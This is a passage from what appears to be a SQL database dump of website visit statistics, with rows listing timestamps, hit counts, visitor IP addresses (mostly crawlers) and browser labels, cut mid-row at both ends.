r'),(172674,1509465779,1,1,0,0,'137.74.207.114','other'),(172675,1509466050,1,1,0,0,'8.29.198.25','other'),(172676,1509466078,1,1,0,0,'180.76.15.26','other'),(172677,1509466416,1,1,0,0,'217.182.132.173','other'),(172678,1509466737,1,1,0,0,'157.55.39.206','other'),(172679,1509466852,1,1,0,0,'217.182.132.171','other'),(172680,1509466937,1,1,0,0,'51.255.65.65','other'),(172681,1509467069,1,1,0,0,'91.196.178.165','chrome'),(172682,1509467675,1,1,0,0,'217.182.132.83','other'),(172683,1509469191,1,1,0,0,'51.255.65.74','other'),(172684,1509469477,1,1,0,0,'217.69.134.176','other'),(172685,1509469747,1,1,0,0,'217.69.133.191','other'),(172686,1509469809,1,0,1,0,'66.249.64.28',''),(172687,1509470576,1,1,0,0,'188.163.16.6','chrome'),(172688,1509470605,1,1,0,0,'51.255.65.97','other'),(172689,1509470728,1,1,0,0,'51.255.65.2','other'),(172690,1509471107,1,1,0,0,'164.132.162.156','other'),(172691,1509471851,1,0,1,0,'66.249.64.30',''),(172692,1509471853,1,1,0,0,'51.255.65.77','other'),(172693,1509471876,1,1,0,0,'91.196.178.39','chrome'),(172694,1509472051,1,1,0,0,'217.182.132.7','other'),(172695,1509472130,1,0,1,0,'66.249.70.25',''),(172696,1509472680,1,1,0,0,'217.182.132.31','other'),(172697,1509472724,1,1,0,0,'188.166.68.64','chrome'),(172698,1509473196,1,1,0,0,'141.8.142.74','other'),(172699,1509473740,1,1,0,0,'51.255.65.94','other'),(172700,1509474138,1,1,0,0,'137.74.201.100','other'),(172701,1509474713,1,1,0,0,'51.255.65.66','other'),(172702,1509475644,1,1,0,0,'217.182.132.7','other'),(172703,1509475681,1,1,0,0,'95.132.132.55','chrome'),(172704,1509475785,1,1,0,0,'217.182.132.149','other'),(172705,1509475942,1,1,0,0,'40.77.167.66','other'),(172706,1509476127,1,1,0,0,'37.9.113.134','other'),(172707,1509476607,1,1,0,0,'207.46.13.21','other'),(172708,1509476829,1,1,0,0,'217.182.132.154','other'),(172709,1509476890,1,1,0,0,'8.29.198.25','other'),(172710,1509477182,1,1,0,0,'51.255.65.2','other'),(172711,1509478403,1,1,0,0,'178.154.171.81','other'),(172712,1509479713,1,1,0,0,'178.154.171.88','other'),(172713,1509479830,1,1,0,0,'217.69.133.230','other'),(172714,1509480166,1,1,0,0,'164.132.162.158','other'),(172715,1509480299,1,1,0,0,'51.255.65.8','other'),(172716,1509480502,1,1,0,0,'217.182.132.5','other'),(172717,1509480863,1,1,0,0,'51.255.65.40','other'),(172718,1509481042,1,1,0,0,'217.182.132.190','other'),(172719,1509481086,1,1,0,0,'51.255.65.72','other'),(172720,1509481484,1,1,0,0,'37.9.113.132','other'),(172721,1509481665,1,1,0,0,'188.163.16.6','chrome'),(172722,1509482934,1,1,0,0,'217.182.132.182','other'),(172723,1509483129,2,0,2,0,'66.249.76.108',''),(172724,1509483345,1,1,0,0,'51.255.71.98','other'),(172725,1509483410,1,1,0,0,'40.77.167.56','other'),(172726,1509483450,1,1,0,0,'217.182.132.6','other'),(172727,1509483532,2,2,0,0,'54.165.59.7','other'),(172728,1509483726,1,1,0,0,'51.255.65.93','other'),(172729,1509484113,1,1,0,0,'164.132.162.153','other'),(172730,1509484187,1,1,0,0,'51.255.65.7','other'),(172731,1509485203,1,1,0,0,'66.249.76.91','chrome'),(172732,1509485592,1,1,0,0,'51.255.65.7','other'),(172733,1509485950,1,1,0,0,'217.182.132.19','other'),(172734,1509485962,1,1,0,0,'217.182.132.179','other'),(172735,1509486451,1,1,0,0,'54.165.59.7','other'),(172736,1509486794,1,1,0,0,'217.182.132.56','other'),(172737,1509487030,1,1,0,0,'217.182.132.79','other'),(172738,1509487073,1,1,0,0,'51.255.65.63','other'),(172739,1509487342,1,1,0,0,'51.255.65.52','other'),(172740,1509487344,1,0,1,0,'66.249.70.29',''),(172741,1509487730,1,1,0,0,'8.29.198.26','other'),(172742,1509487855,1,1,0,0,'51.255.65.72','other'),(172743,1509488117,1,1,0,0,'178.154.171.88','other'),(172744,1509488214,1,1,0,0,'217.182.132.14','other'),(172745,1509488299,2,2,0,0,'54.165.59.7','other'),(172746,1509488780,1,1,0,0,'217.182.132.178','other'),(172747,1509488872,1,1,0,0,'217.182.132.74','other'),(172748,1509489030,1,1,0,0,'40.77.167.56','other'),(172749,1509489805,1,1,0,0,'37.9.113.182','other'),(172750,1509490328,1,1,0,0,'66.249.64.28','chrome'),(172751,1509490827,1,1,0,0,'217.69.133.221','other'),(172752,1509491460,1,1,0,0,'87.250.224.46','other'),(172753,1509491684,4,4,0,0,'141.8.142.74','other'),(172754,1509492082,1,1,0,0,'54.165.59.7','other'),(172755,1509492245,2,2,0,0,'178.154.171.88','other'),(172756,1509493133,4,4,0,0,'141.8.142.74','other'),(172757,1509493470,1,1,0,0,'178.154.171.88','other'),(172758,1509494253,1,0,1,0,'66.249.76.108',''),(172759,1509494328,1,1,0,0,'141.8.142.74','other'),(172760,1509495670,1,1,0,0,'178.154.171.88','other'),(172761,1509496136,1,1,0,0,'137.74.207.110','other'),(172762,1509496456,1,1,0,0,'217.182.132.152','other'),(172763,1509496640,1,1,0,0,'217.182.132.97','other'),(172764,1509497111,1,0,1,0,'66.249.64.28',''),(172765,1509497269,1,1,0,0,'51.255.65.93','other'),(172766,1509497278,1,1,0,0,'51.255.65.6','other'),(172767,1509497455,1,1,0,0,'137.74.207.116','other'),(172768,1509497584,1,1,0,0,'180.76.15.162','other'),(172769,1509498380,1,1,0,0,'141.8.142.74','other'),(172770,1509498566,1,1,0,0,'8.29.198.26','other'),(172771,1509499068,1,1,0,0,'51.255.65.87','other'),(172772,1509499284,32,32,0,0,'142.4.200.37','other'),(172773,1509499302,1,1,0,0,'178.154.171.88','other'),(172774,1509499373,3,3,0,0,'83.161.67.152','other'),(172775,1509499675,1,1,0,0,'141.8.142.74','other'),(172776,1509499870,1,1,0,0,'40.77.167.56','other'),(172777,1509499954,1,1,0,0,'217.69.133.84','other'),(172778,1509500457,1,1,0,0,'217.182.132.177','other'),(172779,1509500564,1,1,0,0,'51.255.65.15','other'),(172780,1509500601,1,1,0,0,'51.255.65.33','other'),(172781,1509501088,1,1,0,0,'217.182.132.53','other'),(172782,1509501482,1,1,0,0,'164.132.162.164','other'),(172783,1509501874,1,0,1,0,'66.249.76.108',''),(172784,1509501936,1,1,0,0,'51.255.65.85','other'),(172785,1509502307,1,1,0,0,'51.255.65.74','other'),(172786,1509502614,1,1,0,0,'95.108.181.111','other'),(172787,1509502646,1,1,0,0,'217.182.132.56','other'),(172788,1509502675,1,1,0,0,'51.255.65.23','other'),(172789,1509502685,1,1,0,0,'164.132.162.188','other'),(172790,1509502808,1,1,0,0,'137.74.207.170','other'),(172791,1509502954,1,1,0,0,'217.182.132.155','other'),(172792,1509503561,1,1,0,0,'217.69.133.236','other'),(172793,1509503760,1,1,0,0,'51.255.65.41','other'),(172794,1509503931,2,2,0,0,'178.154.171.24','other'),(172795,1509504236,1,1,0,0,'37.9.113.151','other'),(172796,1509504453,1,1,0,0,'87.250.224.125','other'),(172797,1509504550,1,1,0,0,'51.255.71.129','other'),(172798,1509504589,1,1,0,0,'137.74.207.120','other'),(172799,1509504919,1,1,0,0,'217.182.132.97','other'),(172800,1509504994,1,1,0,0,'217.182.132.66','other'),(172801,1509505320,1,1,0,0,'217.182.132.92','other'),(172802,1509505737,1,1,0,0,'217.182.132.83','other'),(172803,1509505998,1,0,1,0,'66.249.76.109',''),(172804,1509506113,1,1,0,0,'157.55.39.206','other'),(172805,1509506380,1,1,0,0,'217.182.132.21','other'),(172806,1509506706,1,1,0,0,'217.182.132.182','other'),(172807,1509506762,2,2,0,0,'216.244.66.237','other'),(172808,1509506953,1,1,0,0,'217.182.132.14','other'),(172809,1509507098,1,1,0,0,'217.182.132.68','other'),(172810,1509507443,1,1,0,0,'217.182.132.75','other'),(172811,1509507548,1,1,0,0,'217.182.132.37','other'),(172812,1509507952,1,1,0,0,'217.182.132.84','other'),(172813,1509508186,1,1,0,0,'37.9.113.134','other'),(172814,1509508443,1,1,0,0,'51.255.65.47','other'),(172815,1509508558,1,1,0,0,'137.74.203.194','other'),(172816,1509508753,1,1,0,0,'51.255.65.36','other'),(172817,1509508783,1,0,1,0,'66.249.64.28',''),(172818,1509509407,1,1,0,0,'8.29.198.25','other'),(172819,1509509474,1,1,0,0,'217.182.132.35','other'),(172820,1509509525,1,1,0,0,'217.182.132.172','other'),(172821,1509509855,1,1,0,0,'51.255.71.114','other'),(172822,1509509923,1,1,0,0,'137.74.201.108','other'),(172823,1509510163,2,2,0,0,'51.255.65.36','other'),(172824,1509510253,1,1,0,0,'95.108.213.24','other'),(172825,1509510745,1,1,0,0,'217.182.132.86','other'),(172826,1509511322,1,1,0,0,'51.255.71.101','other'),(172827,1509511508,1,1,0,0,'141.8.142.96','other'),(172828,1509512306,1,1,0,0,'188.255.59.142','chrome'),(172829,1509512648,1,1,0,0,'178.154.200.32','other'),(172830,1509512967,1,1,0,0,'51.255.65.13','other'),(172831,1509512998,1,1,0,0,'51.255.65.62','other'),(172832,1509513690,1,1,0,0,'217.182.132.71','other'),(172833,1509513764,1,1,0,0,'67.215.230.89','other'),(172834,1509513992,1,1,0,0,'164.132.162.164','other'),(172835,1509514163,1,1,0,0,'51.255.65.46','other'),(172836,1509514617,1,1,0,0,'5.45.207.58','other'),(172837,1509515009,1,0,1,0,'66.249.76.108',''),(172838,1509515094,1,1,0,0,'217.69.133.242','other'),(172839,1509515101,1,1,0,0,'51.255.65.31','other'),(172840,1509515144,1,1,0,0,'137.74.207.114','other'),(172841,1509515354,1,1,0,0,'141.8.142.96','other'),(172842,1509515388,1,1,0,0,'217.69.133.236','other'),(172843,1509515464,1,1,0,0,'141.8.142.123','other'),(172844,1509515600,1,1,0,0,'91.196.177.46','firefox'),(172845,1509515961,1,1,0,0,'91.196.178.67','chrome'),(172846,1509516144,1,1,0,0,'37.9.113.157','other'),(172847,1509516229,1,1,0,0,'178.95.47.169','chrome'),(172848,1509516459,1,1,0,0,'87.250.224.77','other'),(172849,1509516857,1,1,0,0,'5.45.207.58','other'),(172850,1509516927,1,1,0,0,'213.180.203.8','other'),(172851,1509517390,1,1,0,0,'178.154.171.81','other'),(172852,1509517865,1,1,0,0,'40.77.167.66','other'),(172853,1509517930,1,1,0,0,'141.8.142.29','other'),(172854,1509517966,1,1,0,0,'87.250.224.125','other'),(172855,1509518072,1,0,1,0,'66.249.70.27',''),(172856,1509518156,1,1,0,0,'91.196.178.67','chrome'),(172857,1509518189,1,1,0,0,'164.132.164.180','other'),(172858,1509518693,1,0,1,0,'66.249.76.107',''),(172859,1509518772,1,1,0,0,'37.53.225.103','chrome'),(172860,1509519017,1,0,1,0,'66.249.76.108',''),(172861,1509519072,1,1,0,0,'91.196.178.134','chrome'),(172862,1509519301,1,1,0,0,'51.255.65.73','other'),(172863,1509519314,1,1,0,0,'51.255.65.35','other'),(172864,1509519370,1,1,0,0,'217.182.132.85','other'),(172865,1509519398,1,1,0,0,'91.196.178.70','chrome'),(172866,1509519826,1,1,0,0,'37.9.113.80','other'),(172867,1509519829,1,1,0,0,'141.8.132.22','other'),(172868,1509520012,1,1,0,0,'217.182.132.153','other'),(172869,1509520242,1,1,0,0,'8.29.198.25','other'),(172870,1509520323,1,1,0,0,'37.54.121.100','firefox'),(172871,1509520392,1,1,0,0,'217.69.133.70','other'),(172872,1509520518,1,1,0,0,'51.255.65.82','other'),(172873,1509520530,1,1,0,0,'217.69.133.247','other'),(172874,1509520531,1,1,0,0,'91.246.100.46','chrome'),(172875,1509520620,1,1,0,0,'188.166.63.98','chrome'),(172876,1509520669,1,1,0,0,'164.132.162.153','other'),(172877,1509521005,1,1,0,0,'51.255.65.93','other'),(172878,1509521050,1,1,0,0,'217.182.132.174','other'),(172879,1509521642,1,1,0,0,'178.154.200.32','other'),(172880,1509521920,1,1,0,0,'95.132.104.157','firefox'),(172881,1509522312,1,1,0,0,'91.196.178.166','chrome'),(172882,1509523075,1,1,0,0,'51.255.65.4','other'),(172883,1509523323,1,1,0,0,'217.182.132.20','other'),(172884,1509523495,1,1,0,0,'213.5.192.159','chrome'),(172885,1509523762,1,1,0,0,'137.74.201.99','other'),(172886,1509523832,1,1,0,0,'51.255.65.65','other'),(172887,1509523964,1,1,0,0,'217.182.132.69','other'),(172888,1509523973,1,1,0,0,'91.196.178.70','chrome'),(172889,1509524062,1,1,0,0,'207.46.13.21','other'),(172890,1509524080,1,1,0,0,'217.182.132.178','other'),(172891,1509524304,1,1,0,0,'51.255.65.15','other'),(172892,1509524841,1,1,0,0,'51.255.65.11','other'),(172893,1509525086,1,1,0,0,'91.196.178.68','chrome'),(172894,1509525219,1,1,0,0,'217.69.133.59','other'),(172895,1509525425,1,1,0,0,'217.69.133.219','other'),(172896,1509526236,1,1,0,0,'91.196.177.46','firefox'),(172897,1509526313,1,1,0,0,'217.182.132.184','other'),(172898,1509526439,1,1,0,0,'51.255.71.110','other'),(172899,1509526581,1,1,0,0,'40.77.167.56','other'),(172900,1509526749,1,1,0,0,'91.196.178.67','chrome'),(172901,1509526951,1,1,0,0,'217.182.132.17','other'),(172902,1509527176,1,1,0,0,'51.255.65.69','other'),(172903,1509527236,1,1,0,0,'91.197.185.228','chrome'),(172904,1509527626,1,1,0,0,'137.74.207.102','other'),(172905,1509527874,1,1,0,0,'217.182.132.153','other'),(172906,1509527968,1,1,0,0,'51.255.65.24','other'),(172907,1509528216,1,1,0,0,'51.255.65.35','other'),(172908,1509528251,1,1,0,0,'87.250.224.46','other'),(172909,1509528334,1,1,0,0,'37.73.197.235','chrome'),(172910,1509528628,1,1,0,0,'217.69.136.205','other'),(172911,1509528879,1,1,0,0,'5.45.207.49','other'),(172912,1509529126,1,1,0,0,'91.196.177.46','other'),(172913,1509529235,1,1,0,0,'91.196.178.70','chrome'),(172914,1509529462,1,1,0,0,'217.182.132.175','other'),(172915,1509529569,1,1,0,0,'217.182.132.32','other'),(172916,1509529718,1,1,0,0,'217.69.133.215','other'),(172917,1509530940,1,1,0,0,'217.69.133.247','other'),(172918,1509531079,1,1,0,0,'8.29.198.25','other'),(172919,1509531200,1,1,0,0,'217.182.132.157','other'),(172920,1509531507,1,1,0,0,'51.255.71.126','other'),(172921,1509531669,1,1,0,0,'51.255.65.86','other'),(172922,1509531710,1,1,0,0,'91.196.178.68','chrome'),(172923,1509531968,1,1,0,0,'51.255.65.60','other'),(172924,1509532101,1,1,0,0,'51.255.65.38','other'),(172925,1509532261,1,1,0,0,'217.69.133.191','other'),(172926,1509532359,1,1,0,0,'91.196.178.67','chrome'),(172927,1509532510,1,1,0,0,'91.196.178.167','chrome'),(172928,1509532511,1,1,0,0,'37.9.113.182','other'),(172929,1509533023,1,1,0,0,'40.77.167.66','other'),(172930,1509533180,1,1,0,0,'40.77.167.56','other'),(172931,1509533422,3,3,0,0,'5.9.156.74','other'),(172932,1509534222,1,1,0,0,'217.182.132.180','other'),(172933,1509534320,1,1,0,0,'51.255.65.51','other'),(172934,1509534390,1,1,0,0,'91.196.178.134','firefox'),(172935,1509534568,1,1,0,0,'217.69.133.246','other'),(172936,1509534888,1,1,0,0,'91.196.178.70','chrome'),(172937,1509534993,1,1,0,0,'91.90.10.63','chrome'),(172938,1509535097,1,1,0,0,'51.255.65.5','other'),(172939,1509535116,1,1,0,0,'51.255.71.132','other'),(172940,1509535222,1,1,0,0,'51.255.71.123','other'),(172941,1509535517,1,1,0,0,'77.37.220.219','msie'),(172942,1509535885,1,1,0,0,'37.9.113.138','other'),(172943,1509535953,1,0,1,0,'66.249.76.109',''),(172944,1509536177,1,1,0,0,'51.255.65.97','other'),(172945,1509536962,1,1,0,0,'217.182.132.32','other'),(172946,1509537005,1,1,0,0,'137.74.207.161','other'),(172947,1509537021,1,1,0,0,'164.132.162.160','other'),(172948,1509538132,1,1,0,0,'157.55.39.206','other'),(172949,1509538175,1,1,0,0,'178.154.171.4','other'),(172950,1509538316,1,1,0,0,'213.180.203.7','other'),(172951,1509538326,8,8,0,0,'62.210.251.247','other'),(172952,1509538428,1,1,0,0,'217.69.136.208','other'),(172953,1509538851,1,1,0,0,'69.30.198.202','other'),(172954,1509539869,1,1,0,0,'217.182.132.94','other'),(172955,1509540225,1,1,0,0,'51.255.65.52','other'),(172956,1509540337,1,1,0,0,'91.196.178.68','firefox'),(172957,1509540898,1,1,0,0,'217.182.132.17','other'),(172958,1509540970,1,1,0,0,'51.255.65.85','other'),(172959,1509541038,1,1,0,0,'217.182.132.173','other'),(172960,1509541497,1,1,0,0,'217.182.132.147','other'),(172961,1509541514,1,1,0,0,'91.196.178.67','chrome'),(172962,1509541586,1,1,0,0,'51.255.65.33','other'),(172963,1509541908,1,1,0,0,'8.29.198.26','other'),(172964,1509542223,1,1,0,0,'35.184.189.105','other'),(172965,1509542591,1,1,0,0,'217.69.133.239','other'),(172966,1509542621,1,1,0,0,'51.255.65.88','other'),(172967,1509542712,1,0,1,0,'66.249.76.109',''),(172968,1509542719,1,1,0,0,'217.182.132.24','other'),(172969,1509543049,1,1,0,0,'91.196.178.166','chrome'),(172970,1509543559,1,1,0,0,'91.196.178.68','chrome'),(172971,1509543962,1,1,0,0,'217.182.132.73','other'),(172972,1509544061,1,1,0,0,'51.255.65.37','other'),(172973,1509544469,1,1,0,0,'51.255.71.113','other'),(172974,1509544547,1,1,0,0,'91.196.178.168','chrome'),(172975,1509544984,1,1,0,0,'51.255.65.86','other'),(172976,1509545281,1,1,0,0,'35.184.189.105','other'),(172977,1509545661,1,1,0,0,'217.182.132.14','other'),(172978,1509545673,3,3,0,0,'162.210.196.98','other'),(172979,1509545838,1,1,0,0,'216.244.66.237','other'),(172980,1509546316,1,1,0,0,'51.255.65.56','other'),(172981,1509546421,1,1,0,0,'217.182.132.175','other'),(172982,1509546606,1,1,0,0,'51.255.65.76','other'),(172983,1509547352,2,1,1,0,'66.249.76.89',''),(172984,1509547506,1,1,0,0,'77.222.134.100','firefox'),(172985,1509547883,1,1,0,0,'217.182.132.181','other'),(172986,1509548023,1,1,0,0,'51.255.65.15','other'),(172987,1509548067,1,0,1,0,'66.249.76.93',''),(172988,1509548931,1,1,0,0,'217.182.132.172','other'),(172989,1509549125,1,1,0,0,'66.249.76.108','chrome'),(172990,1509549364,1,1,0,0,'216.244.66.237','other'),(172991,1509549475,1,1,0,0,'37.9.113.182','other'),(172992,1509549597,1,1,0,0,'217.182.132.73','other'),(172993,1509549881,1,1,0,0,'217.182.132.57','other'),(172994,1509550153,1,1,0,0,'178.154.171.4','other'),(172995,1509550279,1,1,0,0,'95.220.223.222','msie'),(172996,1509550570,1,1,0,0,'51.255.65.51','other'),(172997,1509550609,1,1,0,0,'138.68.82.128','chrome'),(172998,1509550824,1,1,0,0,'217.182.132.5','other'),(172999,1509551383,1,1,0,0,'217.182.132.23','other'),(173000,1509552165,1,1,0,0,'217.69.133.249','other'),(173001,1509552176,1,1,0,0,'51.255.65.14','other'),(173002,1509552675,1,1,0,0,'51.255.65.58','other'),(173003,1509552688,1,1,0,0,'91.196.178.166','chrome'),(173004,1509552738,1,1,0,0,'8.29.198.26','other'),(173005,1509552777,1,1,0,0,'151.80.27.118','other'),(173006,1509553728,1,1,0,0,'217.182.132.30','other'),(173007,1509553776,1,1,0,0,'51.255.71.101','other'),(173008,1509553793,1,0,1,0,'66.249.70.27',''),(173009,1509554073,1,1,0,0,'51.255.65.56','other'),(173010,1509554087,1,1,0,0,'66.249.64.30','chrome'),(173011,1509555051,1,1,0,0,'217.182.132.54','other'),(173012,1509555354,1,1,0,0,'137.74.207.170','other'),(173013,1509555373,1,1,0,0,'78.111.189.25','chrome'),(173014,1509555558,1,0,1,0,'66.249.76.109',''),(173015,1509555714,1,1,0,0,'91.196.178.162','chrome'),(173016,1509556048,1,1,0,0,'217.69.133.221','other'),(173017,1509556352,1,1,0,0,'217.182.132.60','other'),(173018,1509556427,1,1,0,0,'217.182.132.51','other'),(173019,1509557501,1,1,0,0,'217.182.132.149','other'),(173020,1509557867,1,1,0,0,'217.69.136.203','other'),(173021,1509558072,1,1,0,0,'91.196.178.38','chrome'),(173022,1509558309,1,1,0,0,'37.9.113.132','other'),(173023,1509558847,1,1,0,0,'217.182.132.76','other'),(173024,1509559120,1,1,0,0,'91.196.178.40','chrome'),(173025,1509559309,1,1,0,0,'162.210.196.129','other'),(173026,1509559432,1,1,0,0,'217.69.133.221','other'),(173027,1509559460,1,1,0,0,'164.132.162.164','other'),(173028,1509559871,1,1,0,0,'51.255.71.123','other'),(173029,1509560061,1,1,0,0,'51.255.71.119','other'),(173030,1509560478,1,1,0,0,'51.255.65.92','other'),(173031,1509560575,1,0,1,0,'66.249.76.107',''),(173032,1509560818,1,1,0,0,'178.154.171.10','other'),(173033,1509560848,1,1,0,0,'176.31.231.10','other'),(173034,1509561760,1,0,1,0,'66.249.64.29',''),(173035,1509561815,1,1,0,0,'37.9.113.132','other'),(173036,1509562002,1,0,1,0,'66.249.76.107',''),(173037,1509562296,1,1,0,0,'66.249.70.29','chrome'),(173038,1509562385,1,1,0,0,'164.132.162.158','other'),(173039,1509562892,1,1,0,0,'213.180.203.40','other'),(173040,1509562910,1,1,0,0,'51.255.65.14','other'),(173041,1509562948,1,1,0,0,'91.196.178.99','chrome'),(173042,1509563118,1,1,0,0,'217.182.132.92','other'),(173043,1509563131,1,1,0,0,'217.182.132.18','other'),(173044,1509563201,1,1,0,0,'91.229.123.69','chrome'),(173045,1509563531,1,1,0,0,'51.255.65.24','other'),(173046,1509563568,1,1,0,0,'8.29.198.25','other'),(173047,1509563798,1,1,0,0,'217.182.132.66','other'),(173048,1509564143,1,0,1,0,'66.249.76.93',''),(173049,1509564238,1,1,0,0,'91.196.178.40','chrome'),(173050,1509564303,1,1,0,0,'67.215.230.93','other'),(173051,1509564375,1,1,0,0,'51.255.71.116','other'),(173052,1509564535,1,1,0,0,'37.54.18.231','chrome'),(173053,1509565184,1,1,0,0,'91.196.178.69','chrome'),(173054,1509565255,1,1,0,0,'5.45.207.49','other'),(173055,1509565278,1,0,1,0,'66.249.70.29',''),(173056,1509566153,1,1,0,0,'109.95.36.201','chrome'),(173057,1509566161,1,1,0,0,'216.244.66.237','other'),(173058,1509566316,1,1,0,0,'5.45.207.82','other'),(173059,1509566320,1,1,0,0,'5.45.207.49','other'),(173060,1509567092,1,1,0,0,'217.182.132.32','other'),(173061,1509567508,1,1,0,0,'164.132.162.159','other'),(173062,1509567562,1,1,0,0,'51.255.65.19','other'),(173063,1509567720,1,1,0,0,'51.255.65.73','other'),(173064,1509567900,1,1,0,0,'91.196.178.39','chrome'),(173065,1509568157,1,1,0,0,'217.182.132.24','other'),(173066,1509568595,2,2,0,0,'62.210.103.36','other'),(173067,1509568690,1,1,0,0,'51.255.65.96','other'),(173068,1509568701,1,1,0,0,'37.9.113.100','other'),(173069,1509568765,1,1,0,0,'51.255.65.92','other'),(173070,1509568914,1,1,0,0,'51.255.65.85','other'),(173071,1509569552,1,1,0,0,'51.255.65.82','other'),(173072,1509569925,1,1,0,0,'51.255.65.69','other'),(173073,1509570120,1,1,0,0,'67.215.230.93','other'),(173074,1509570585,1,1,0,0,'51.255.65.16','other'),(173075,1509570863,1,1,0,0,'217.182.132.28','other'),(173076,1509570954,2,2,0,0,'5.45.207.49','other'),(173077,1509570958,1,1,0,0,'95.108.181.111','other'),(173078,1509571616,1,1,0,0,'180.76.15.148','other'),(173079,1509571632,1,0,1,0,'66.249.76.107',''),(173080,1509571646,1,1,0,0,'51.255.71.132','other'),(173081,1509573524,1,1,0,0,'151.80.27.118','other'),(173082,1509573565,1,1,0,0,'217.182.132.174','other'),(173083,1509573682,1,1,0,0,'217.182.132.36','other'),(173084,1509573849,1,1,0,0,'51.255.65.28','other'),(173085,1509574133,1,1,0,0,'178.154.171.81','other'),(173086,1509574241,1,1,0,0,'51.255.65.20','other'),(173087,1509574329,1,1,0,0,'5.45.207.82','other'),(173088,1509574400,1,1,0,0,'8.29.198.27','other'),(173089,1509574471,1,1,0,0,'51.255.65.76','other'),(173090,1509574753,1,1,0,0,'51.255.71.114','other'),(173091,1509575440,1,1,0,0,'217.182.132.6','other'),(173092,1509576170,2,2,0,0,'5.45.207.49','other'),(173093,1509576251,1,1,0,0,'51.255.65.60','other'),(173094,1509576303,1,1,0,0,'217.182.132.191','other'),(173095,1509577510,1,1,0,0,'217.182.132.64','other'),(173096,1509577743,1,1,0,0,'178.154.171.88','other'),(173097,1509578200,1,1,0,0,'217.182.132.72','other'),(173098,1509578281,1,1,0,0,'66.249.76.89','chrome'),(173099,1509578327,1,1,0,0,'51.255.65.55','other'),(173100,1509578419,1,1,0,0,'217.182.132.170','other'),(173101,1509578545,1,1,0,0,'51.255.65.73','other'),(173102,1509578762,1,1,0,0,'51.255.65.97','other'),(173103,1509578928,1,1,0,0,'5.45.207.82','other'),(173104,1509579294,1,0,1,0,'66.249.76.107',''),(173105,1509579547,1,1,0,0,'37.9.113.100','other'),(173106,1509579548,1,1,0,0,'35.184.189.105','other'),(173107,1509579777,1,1,0,0,'217.69.136.203','other'),(173108,1509579875,1,1,0,0,'51.255.71.127','other'),(173109,1509580237,1,1,0,0,'37.9.113.101','other'),(173110,1509580239,1,1,0,0,'217.182.132.30','other'),(173111,1509580240,2,2,0,0,'37.9.113.182','other'),(173112,1509580354,1,1,0,0,'37.9.113.115','other'),(173113,1509580367,1,1,0,0,'217.182.132.33','other'),(173114,1509580879,1,1,0,0,'37.9.113.100','other'),(173115,1509581132,1,1,0,0,'51.255.65.93','other'),(173116,1509581396,1,1,0,0,'51.255.65.23','other'),(173117,1509581415,1,0,1,0,'66.249.76.107',''),(173118,1509581435,1,1,0,0,'217.182.132.61','other'),(173119,1509581458,1,1,0,0,'217.69.133.13','other'),(173120,1509581569,1,1,0,0,'178.154.171.10','other'),(173121,1509581647,1,1,0,0,'51.255.71.123','other'),(173122,1509581867,1,1,0,0,'217.182.132.54','other'),(173123,1509581998,1,1,0,0,'157.55.39.206','other'),(173124,1509582272,1,1,0,0,'217.182.132.92','other'),(173125,1509582630,1,1,0,0,'217.69.133.220','other'),(173126,1509582747,1,1,0,0,'178.154.171.60','other'),(173127,1509583586,1,1,0,0,'178.154.171.81','other'),(173128,1509584208,1,0,1,0,'66.249.76.108',''),(173129,1509584379,1,1,0,0,'217.69.133.15','other'),(173130,1509585130,1,1,0,0,'207.46.13.21','other'),(173131,1509585197,1,1,0,0,'40.77.167.56','other'),(173132,1509585227,1,1,0,0,'8.29.198.26','other'),(173133,1509585434,1,1,0,0,'217.182.132.4','other'),(173134,1509585454,1,1,0,0,'51.255.65.94','other'),(173135,1509585662,1,0,1,0,'66.249.64.30',''),(173136,1509586092,1,1,0,0,'217.69.133.28','other'),(173137,1509586299,1,0,1,0,'66.249.64.28',''),(173138,1509586411,1,0,1,0,'66.249.76.107',''),(173139,1509587277,1,1,0,0,'51.255.65.82','other'),(173140,1509587553,1,1,0,0,'164.132.162.188','other'),(173141,1509587566,1,0,1,0,'66.249.64.29',''),(173142,1509587599,1,1,0,0,'40.77.167.56','other'),(173143,1509588882,1,1,0,0,'217.182.132.95','other'),(173144,1509589079,1,1,0,0,'178.154.171.55','other'),(173145,1509589089,1,1,0,0,'66.249.76.107','chrome'),(173146,1509589309,1,1,0,0,'217.182.132.179','other'),(173147,1509589322,1,1,0,0,'94.180.150.187','msie'),(173148,1509589422,1,1,0,0,'37.9.113.110','other'),(173149,1509589483,1,1,0,0,'37.9.113.132','other'),(173150,1509589931,1,1,0,0,'51.255.65.49','other'),(173151,1509590177,1,1,0,0,'51.255.71.118','other'),(173152,1509590236,1,1,0,0,'178.154.171.88','other'),(173153,1509590424,1,1,0,0,'178.154.200.7','other'),(173154,1509590841,1,1,0,0,'217.182.132.82','other'),(173155,1509591041,1,1,0,0,'178.154.171.55','other'),(173156,1509591369,2,2,0,0,'37.9.113.114','other'),(173157,1509592619,1,0,1,0,'66.249.76.108',''),(173158,1509592636,1,1,0,0,'178.154.200.32','other'),(173159,1509592679,1,1,0,0,'66.249.64.29','chrome'),(173160,1509592685,1,1,0,0,'87.250.224.85','other'),(173161,1509592947,2,2,0,0,'5.45.207.58','other'),(173162,1509593513,1,1,0,0,'37.9.113.207','other'),(173163,1509593796,1,1,0,0,'37.9.113.132','other'),(173164,1509594447,1,1,0,0,'217.182.132.149','other'),(173165,1509594547,1,1,0,0,'164.132.162.159','other'),(173166,1509594791,1,1,0,0,'40.77.167.56','other'),(173167,1509595084,1,1,0,0,'217.182.132.88','other'),(173168,1509595199,1,1,0,0,'217.182.132.148','other'),(173169,1509595967,1,1,0,0,'217.182.132.28','other'),(173170,1509596056,1,1,0,0,'8.29.198.25','other'),(173171,1509596063,1,1,0,0,'217.69.136.209','other'),(173172,1509596131,1,1,0,0,'213.180.203.7','other'),(173173,1509596497,1,1,0,0,'157.55.39.206','other'),(173174,1509596801,1,1,0,0,'87.250.224.85','other'),(173175,1509596966,1,1,0,0,'87.250.224.39','other'),(173176,1509597079,1,1,0,0,'37.113.61.179','chrome'),(173177,1509597092,2,2,0,0,'5.9.144.234','other'),(173178,1509597192,1,0,1,0,'66.249.70.27',''),(173179,1509597709,1,1,0,0,'188.226.170.53','chrome'),(173180,1509597712,1,1,0,0,'37.9.113.60','other'),(173181,1509598245,1,1,0,0,'37.9.113.115','other'),(173182,1509598655,1,1,0,0,'94.180.167.9','msie'),(173183,1509599226,1,1,0,0,'141.8.132.19','other'),(173184,1509599454,1,1,0,0,'180.76.15.157','other'),(173185,1509599486,1,1,0,0,'217.182.132.191','other'),(173186,1509599747,1,1,0,0,'217.182.132.95','other'),(173187,1509600273,1,1,0,0,'164.132.162.154','o